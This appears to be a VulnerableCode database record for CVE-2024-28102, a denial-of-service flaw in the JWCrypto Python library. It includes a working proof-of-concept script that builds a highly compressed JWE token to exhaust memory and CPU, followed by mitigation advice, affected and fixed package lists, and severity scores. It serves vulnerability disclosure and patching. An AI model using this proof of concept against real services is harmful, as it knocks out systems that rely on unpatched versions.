Lookup for vulnerabilities affecting packages.

Vulnerability_idVCID-ygj7-qwt8-sud5
Summary
JWCrypto vulnerable to JWT bomb Attack in `deserialize` function
## Affected version
Vendor: https://github.com/latchset/jwcrypto
Version: 1.5.5

## Description
An attacker can cause a DoS attack by passing in a malicious JWE Token with a high compression ratio.
When the server processes this Token, it will consume a lot of memory and processing time.

## Poc
```python
from jwcrypto import jwk, jwe
from jwcrypto.common import json_encode, json_decode
import time
public_key = jwk.JWK()
private_key = jwk.JWK.generate(kty='RSA', size=2048)
public_key.import_key(**json_decode(private_key.export_public()))


payload = '{"u": "' + "u" * 400000000 + '", "uu":"' + "u" * 400000000 + '"}'
protected_header = {
    "alg": "RSA-OAEP-256",
    "enc": "A256CBC-HS512",
    "typ": "JWE",
    "zip": "DEF",
    "kid": public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode('utf-8'),
                   recipient=public_key,
                   protected=protected_header)
enc = jwetoken.serialize(compact=True)

print("-----uncompress-----")

print(len(enc))

begin = time.time()

jwetoken = jwe.JWE()
jwetoken.deserialize(enc, key=private_key)

print(time.time() - begin)

print("-----compress-----")

payload = '{"u": "' + "u" * 400000 + '", "uu":"' + "u" * 400000 + '"}'
protected_header = {
    "alg": "RSA-OAEP-256",
    "enc": "A256CBC-HS512",
    "typ": "JWE",
    "kid": public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode('utf-8'),
                   recipient=public_key,
                   protected=protected_header)
enc = jwetoken.serialize(compact=True)

print(len(enc))

begin = time.time()

jwetoken = jwe.JWE()
jwetoken.deserialize(enc, key=private_key)

print(time.time() - begin)
```
It can be found that when processing Tokens with similar lengths, the processing time of compressed tokens is significantly longer.
<img width="172" alt="image" src="https://github.com/latchset/jwcrypto/assets/133195620/23193327-3cd7-499a-b5aa-28c56af92785">



## Mitigation
To mitigate this vulnerability, it is recommended to limit the maximum token length to 250K. This approach has also
been adopted by the JWT library System.IdentityModel.Tokens.Jwt used in Microsoft Azure [1], effectively preventing
attackers from exploiting this vulnerability with high compression ratio tokens.

## References
[1] [CVE-2024-21319](https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/security/advisories/GHSA-8g9c-28fc-mcx2)
Aliases
0
alias CVE-2024-28102
1
alias GHSA-j857-7rvv-vj97
Fixed_packages
0
url pkg:deb/debian/python-jwcrypto@0.8.0-1?distro=trixie
purl pkg:deb/debian/python-jwcrypto@0.8.0-1?distro=trixie
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3uav-qamf-b7ek
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-jwcrypto@0.8.0-1%3Fdistro=trixie
1
url pkg:deb/debian/python-jwcrypto@0.8.0-1%2Bdeb11u1?distro=trixie
purl pkg:deb/debian/python-jwcrypto@0.8.0-1%2Bdeb11u1?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-jwcrypto@0.8.0-1%252Bdeb11u1%3Fdistro=trixie
2
url pkg:deb/debian/python-jwcrypto@1.1.0-1%2Bdeb12u1?distro=trixie
purl pkg:deb/debian/python-jwcrypto@1.1.0-1%2Bdeb12u1?distro=trixie
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3uav-qamf-b7ek
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-jwcrypto@1.1.0-1%252Bdeb12u1%3Fdistro=trixie
3
url pkg:deb/debian/python-jwcrypto@1.1.0-1%2Bdeb12u1
purl pkg:deb/debian/python-jwcrypto@1.1.0-1%2Bdeb12u1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3uav-qamf-b7ek
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-jwcrypto@1.1.0-1%252Bdeb12u1
4
url pkg:deb/debian/python-jwcrypto@1.5.6-1?distro=trixie
purl pkg:deb/debian/python-jwcrypto@1.5.6-1?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-jwcrypto@1.5.6-1%3Fdistro=trixie
5
url pkg:pypi/jwcrypto@1.5.6
purl pkg:pypi/jwcrypto@1.5.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-9rtx-w9ry-rkcj
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/jwcrypto@1.5.6
Affected_packages
0
url pkg:deb/debian/python-jwcrypto@0.3.2-1
purl pkg:deb/debian/python-jwcrypto@0.3.2-1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-jwcrypto@0.3.2-1
1
url pkg:deb/debian/python-jwcrypto@0.8.0-1
purl pkg:deb/debian/python-jwcrypto@0.8.0-1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3uav-qamf-b7ek
1
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-jwcrypto@0.8.0-1
2
url pkg:pypi/jwcrypto@0.2.0
purl pkg:pypi/jwcrypto@0.2.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3uav-qamf-b7ek
1
vulnerability VCID-rdvk-cbp2-wuh2
2
vulnerability VCID-t87t-re4z-gycu
3
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/jwcrypto@0.2.0
3
url pkg:pypi/jwcrypto@0.2.1
purl pkg:pypi/jwcrypto@0.2.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3uav-qamf-b7ek
1
vulnerability VCID-rdvk-cbp2-wuh2
2
vulnerability VCID-t87t-re4z-gycu
3
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/jwcrypto@0.2.1
4
url pkg:pypi/jwcrypto@0.3.0
purl pkg:pypi/jwcrypto@0.3.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3uav-qamf-b7ek
1
vulnerability VCID-rdvk-cbp2-wuh2
2
vulnerability VCID-t87t-re4z-gycu
3
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/jwcrypto@0.3.0
5
url pkg:pypi/jwcrypto@0.3.1
purl pkg:pypi/jwcrypto@0.3.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3uav-qamf-b7ek
1
vulnerability VCID-rdvk-cbp2-wuh2
2
vulnerability VCID-t87t-re4z-gycu
3
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/jwcrypto@0.3.1
6
url pkg:pypi/jwcrypto@0.4.0
purl pkg:pypi/jwcrypto@0.4.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3uav-qamf-b7ek
1
vulnerability VCID-rdvk-cbp2-wuh2
2
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/jwcrypto@0.4.0
7
url pkg:pypi/jwcrypto@0.4.1
purl pkg:pypi/jwcrypto@0.4.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3uav-qamf-b7ek
1
vulnerability VCID-rdvk-cbp2-wuh2
2
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/jwcrypto@0.4.1
8
url pkg:pypi/jwcrypto@0.4.2
purl pkg:pypi/jwcrypto@0.4.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3uav-qamf-b7ek
1
vulnerability VCID-rdvk-cbp2-wuh2
2
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/jwcrypto@0.4.2
9
url pkg:pypi/jwcrypto@0.5.0
purl pkg:pypi/jwcrypto@0.5.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3uav-qamf-b7ek
1
vulnerability VCID-rdvk-cbp2-wuh2
2
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/jwcrypto@0.5.0
10
url pkg:pypi/jwcrypto@0.6.0
purl pkg:pypi/jwcrypto@0.6.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3uav-qamf-b7ek
1
vulnerability VCID-rdvk-cbp2-wuh2
2
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/jwcrypto@0.6.0
11
url pkg:pypi/jwcrypto@0.7
purl pkg:pypi/jwcrypto@0.7
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3uav-qamf-b7ek
1
vulnerability VCID-rdvk-cbp2-wuh2
2
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/jwcrypto@0.7
12
url pkg:pypi/jwcrypto@0.8
purl pkg:pypi/jwcrypto@0.8
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3uav-qamf-b7ek
1
vulnerability VCID-rdvk-cbp2-wuh2
2
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/jwcrypto@0.8
13
url pkg:pypi/jwcrypto@0.9
purl pkg:pypi/jwcrypto@0.9
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3uav-qamf-b7ek
1
vulnerability VCID-rdvk-cbp2-wuh2
2
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/jwcrypto@0.9
14
url pkg:pypi/jwcrypto@0.9.1
purl pkg:pypi/jwcrypto@0.9.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3uav-qamf-b7ek
1
vulnerability VCID-rdvk-cbp2-wuh2
2
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/jwcrypto@0.9.1
15
url pkg:pypi/jwcrypto@1.0
purl pkg:pypi/jwcrypto@1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3uav-qamf-b7ek
1
vulnerability VCID-rdvk-cbp2-wuh2
2
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/jwcrypto@1.0
16
url pkg:pypi/jwcrypto@1.2
purl pkg:pypi/jwcrypto@1.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3uav-qamf-b7ek
1
vulnerability VCID-rdvk-cbp2-wuh2
2
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/jwcrypto@1.2
17
url pkg:pypi/jwcrypto@1.3
purl pkg:pypi/jwcrypto@1.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3uav-qamf-b7ek
1
vulnerability VCID-rdvk-cbp2-wuh2
2
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/jwcrypto@1.3
18
url pkg:pypi/jwcrypto@1.3.1
purl pkg:pypi/jwcrypto@1.3.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3uav-qamf-b7ek
1
vulnerability VCID-rdvk-cbp2-wuh2
2
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/jwcrypto@1.3.1
19
url pkg:pypi/jwcrypto@1.4
purl pkg:pypi/jwcrypto@1.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3uav-qamf-b7ek
1
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/jwcrypto@1.4
20
url pkg:pypi/jwcrypto@1.4.1
purl pkg:pypi/jwcrypto@1.4.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3uav-qamf-b7ek
1
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/jwcrypto@1.4.1
21
url pkg:pypi/jwcrypto@1.4.2
purl pkg:pypi/jwcrypto@1.4.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3uav-qamf-b7ek
1
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/jwcrypto@1.4.2
22
url pkg:pypi/jwcrypto@1.5.0
purl pkg:pypi/jwcrypto@1.5.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3uav-qamf-b7ek
1
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/jwcrypto@1.5.0
23
url pkg:pypi/jwcrypto@1.5.1
purl pkg:pypi/jwcrypto@1.5.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/jwcrypto@1.5.1
24
url pkg:pypi/jwcrypto@1.5.2
purl pkg:pypi/jwcrypto@1.5.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/jwcrypto@1.5.2
25
url pkg:pypi/jwcrypto@1.5.3
purl pkg:pypi/jwcrypto@1.5.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/jwcrypto@1.5.3
26
url pkg:pypi/jwcrypto@1.5.4
purl pkg:pypi/jwcrypto@1.5.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/jwcrypto@1.5.4
27
url pkg:pypi/jwcrypto@1.5.5
purl pkg:pypi/jwcrypto@1.5.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/jwcrypto@1.5.5
28
url pkg:rpm/redhat/automation-controller@4.5.8-1?arch=el9ap
purl pkg:rpm/redhat/automation-controller@4.5.8-1?arch=el9ap
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-at54-9w17-wbe8
1
vulnerability VCID-duvn-u125-dqan
2
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/automation-controller@4.5.8-1%3Farch=el9ap
29
url pkg:rpm/redhat/automation-controller@4.5.8-1?arch=el8ap
purl pkg:rpm/redhat/automation-controller@4.5.8-1?arch=el8ap
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-at54-9w17-wbe8
1
vulnerability VCID-duvn-u125-dqan
2
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/automation-controller@4.5.8-1%3Farch=el8ap
30
url pkg:rpm/redhat/python-jwcrypto@0.8-5?arch=el9_4
purl pkg:rpm/redhat/python-jwcrypto@0.8-5?arch=el9_4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-ygj7-qwt8-sud5
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/python-jwcrypto@0.8-5%3Farch=el9_4
References
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-28102.json
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-28102.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-28102
reference_id
reference_type
scores
0
value 0.0036
scoring_system epss
scoring_elements 0.5822
published_at 2026-04-21T12:55:00Z
1
value 0.00381
scoring_system epss
scoring_elements 0.59567
published_at 2026-04-11T12:55:00Z
2
value 0.00381
scoring_system epss
scoring_elements 0.59485
published_at 2026-04-07T12:55:00Z
3
value 0.00381
scoring_system epss
scoring_elements 0.59518
published_at 2026-04-04T12:55:00Z
4
value 0.00381
scoring_system epss
scoring_elements 0.59493
published_at 2026-04-02T12:55:00Z
5
value 0.00381
scoring_system epss
scoring_elements 0.59532
published_at 2026-04-13T12:55:00Z
6
value 0.00381
scoring_system epss
scoring_elements 0.59552
published_at 2026-04-12T12:55:00Z
7
value 0.00381
scoring_system epss
scoring_elements 0.59548
published_at 2026-04-09T12:55:00Z
8
value 0.00381
scoring_system epss
scoring_elements 0.59536
published_at 2026-04-08T12:55:00Z
9
value 0.00392
scoring_system epss
scoring_elements 0.60219
published_at 2026-04-16T12:55:00Z
10
value 0.00392
scoring_system epss
scoring_elements 0.60226
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-28102
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28102
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28102
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/latchset/jwcrypto
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/latchset/jwcrypto
5
reference_url https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-02T19:56:39Z/
url https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f
6
reference_url https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-02T19:56:39Z/
url https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97
7
reference_url https://lists.debian.org/debian-lts-announce/2024/09/msg00026.html
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2024/09/msg00026.html
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-28102
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-28102
9
reference_url https://www.vicarius.io/vsociety/posts/denial-of-service-vulnerability-discovered-in-jwcrypto-cve-2024-28102-28103
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.vicarius.io/vsociety/posts/denial-of-service-vulnerability-discovered-in-jwcrypto-cve-2024-28102-28103
10
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1065688
reference_id 1065688
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1065688
11
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2268758
reference_id 2268758
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2268758
12
reference_url https://github.com/advisories/GHSA-j857-7rvv-vj97
reference_id GHSA-j857-7rvv-vj97
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-j857-7rvv-vj97
13
reference_url https://access.redhat.com/errata/RHSA-2024:2559
reference_id RHSA-2024:2559
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:2559
14
reference_url https://access.redhat.com/errata/RHSA-2024:4522
reference_id RHSA-2024:4522
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:4522
Weaknesses
0
cwe_id 770
name Allocation of Resources Without Limits or Throttling
description The product allocates a reusable resource or group of resources on behalf of an actor without imposing any restrictions on the size or number of resources that can be allocated, in violation of the intended security policy for that actor.
1
cwe_id 937
name OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities
description Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2013.
2
cwe_id 1035
name OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities
description Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2017.
3
cwe_id 400
name Uncontrolled Resource Consumption
description The product does not properly control the allocation and maintenance of a limited resource, thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources.
Exploits
Severity_range_score4.0 - 6.9
Exploitability0.5
Weighted_severity6.2
Risk_score3.1
Resource_urlhttp://public2.vulnerablecode.io/vulnerabilities/VCID-ygj7-qwt8-sud5